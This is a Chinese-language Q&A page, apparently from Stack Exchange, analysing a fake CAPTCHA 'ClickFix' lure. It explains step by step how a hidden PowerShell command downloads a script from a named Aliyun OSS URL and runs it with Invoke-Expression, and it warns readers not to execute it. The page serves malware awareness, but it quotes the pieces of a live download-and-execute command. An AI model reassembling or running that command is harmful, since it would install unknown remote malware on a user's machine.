请问点击人机验证后剪贴板中的这条命令具体执行什么操作?
伪造人机验证的恶意命令作用分析
先拆解这条命令的每一步:
- 启动隐藏的PowerShell进程:
cmd.exe /c powershell -WindowStyle Hidden是通过CMD调用PowerShell并隐藏窗口,正常人机验证完全没必要偷偷运行程序,这本身就是可疑点。 - 下载远程脚本:
$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'定义了远程文件地址,接着用System.Net.WebClient下载该地址的文本内容存在变量sLf中。 - 执行未知代码:最后
Invoke-Expression $sLf会把下载到的文本当作PowerShell代码直接运行——这是最危险的部分,远程服务器上的run.txt里写什么,你的电脑就会执行什么。
可能的危害
- 远程脚本大概率是恶意代码:可能偷偷安装挖矿程序、窃取账号密码、加密文件勒索,或是在后台植入广告软件、木马。
- 全程隐蔽运行:因为窗口被隐藏,你完全看不到它的操作,等发现异常时可能已经中招。
这根本不是什么人机验证,是恶意网站诱导你运行远程恶意代码的套路,你没执行是正确的,绝对不要运行这类来历不明的命令。
内容的提问来源于stack exchange,提问作者Jae
相关产品推荐
相关产品推荐

